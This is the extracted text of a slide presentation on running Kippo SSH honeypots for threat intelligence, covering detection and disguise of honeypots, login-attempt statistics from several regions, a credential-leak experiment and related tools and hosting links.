Honey PotzETHAN DODGE (CHP1N)

Disclaimer

The views expressed herein are solely my views and not the views of my employer, or any other organization with which I am associated. I am responsible for the content of this presentation.

Likewise, the research conducted and illustrated herein was performed by me unless otherwise noted.

Audience

lNoobs.lDon't be afraid to ask questions!

lThose looking to get into the honey pot/threat intelligence communities.lThose that already have experience honey potting.

Honey PotzBEWARE OF ADDICTION

Why Honey Pots?

Threat Intel?

Threat Intel?

Types of Honey PotsJUST A MORSEL OF HUNNY

HoneyDrive

Bruteforce.gr

KippoDionaeaHoneydGlastopfConpotThug

Kippo-GraphHoneyd-VizDionaeaFRELK Stack

Low Interaction vs. High Interaction

•Actual machine

•Complete functionality

•Can exploit whatever is

exploitable

•Used to observe targeted attacks

•Not easily detectable

•Bifrozt

•Simulation

•Incomplete functionality

•Cannot be used to exploit other

vulnerabilities

•Used to observe behavior

•Often easily detectable

•Kippo

KippoTHE GOOD AND THE BAD

“Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.”

https://github.com/desaster/kippo

How Kippo Works

How To Detecet Kippo

How To Detecet Kippo

Simple Ways To “Hide” It

•Change the hostname•Add a login banner•Edit userdb.txt•Change file system•Edit /etc/passwd & /etc/shadow•Edit script output

Findings

Login Attempts vs Successes in the past 30 days - LA

Total attempts: 519Total successes: 10

Total attempts: 3,924Total successes: 2

Creds

•Default root/123456 (Top Graph)•Leaked 14 character password (Bottom Graph)

“Leaking” Creds

•Leaked 14 character password to honeypot of pastebin•Posted at 1:14 AM MST•Any guesses as to how long it took until someone logged in?

2 Hours 35 Minutes

•First login seen with correct password seen at 3:49 MST.•Romanian IP Address

•Malicious intent•Pastebin has over 100 views in 2 minutes (Bots)•Saw 5 logins from 3 distinct IP addresses in 12 hours

Login Attempts vs Successes in the past 30 days - Canada

Total attempts: 255,059Total successes: 79

Total attempts: 282,263Total successes: 0

Hosting Problems

You get what you pay for.(Cloud At Cost)

Changed userdb.txt

•Rejects most common 100 passwords from the most common 10 usernames (Top Graph)

•Therefore accepting multiple passwords•Accepts 7 character password from 5 different usernames

•Yet to be cracked •Leaked in a key logger dump this morning at 7:53 MST

Changed fs.pickle

•Spun up an Ubuntu box serving DNS•Used createfs.py to create new fs.pickle•Yet to see better results

•I will blog about it

Login Attempts vs Successes in the past 30 days - Europe

Total attempts: 429,661Total successes: 0

Most attacked box

•In the heart of the EU•Doesn’t get attacked as much as Asian honeypots

•8 character password•Logon banner in Spanish

Typical malicious session

•Wget/curl some script or executable•Chmod it•Execute it•Delete it•99% of the time is scripted

Occasional you’ll get a lot more commands

Typical Detection

•Runs ps –a, ifconfig, or cats a standard file•Sees default Kippo content•Hops out

Kippo VisualizationTHE OLD AND THE NEW

Kippo-Graph

Kippo-Graph

Kippo-Graph

Tango Honeypot Intelligence

@Brian_Warehime

Demo Time

Downloads

•Original Kippo: https://github.com/desaster/kippo•Kippo fork I use: https://github.com/micheloosterhof/kippo

•Supports SFTP and json logging•Is updated regularly

•Download Tango: https://apps.splunk.com/app/2666/•Download Honeydrive: http://sourceforge.net/projects/honeydrive/

Hosting Links

•Crissic – crissic.net ($10/year)lLA and Florida

•Cloud At Cost – cloudatcost.com ($35/life)lCanada

•Time4VPS – Time4VPS (€10/year)lEuropean Union

•Lowendstock.com•Lowendtalk.com

@Andrew__Morris

@Brian_Warehime

@micheloosterhof

@da_667

@Threat_Inc

Contact

Freenode: chp1nTwitter: @chp1nBlog: utzpin.org

el fin.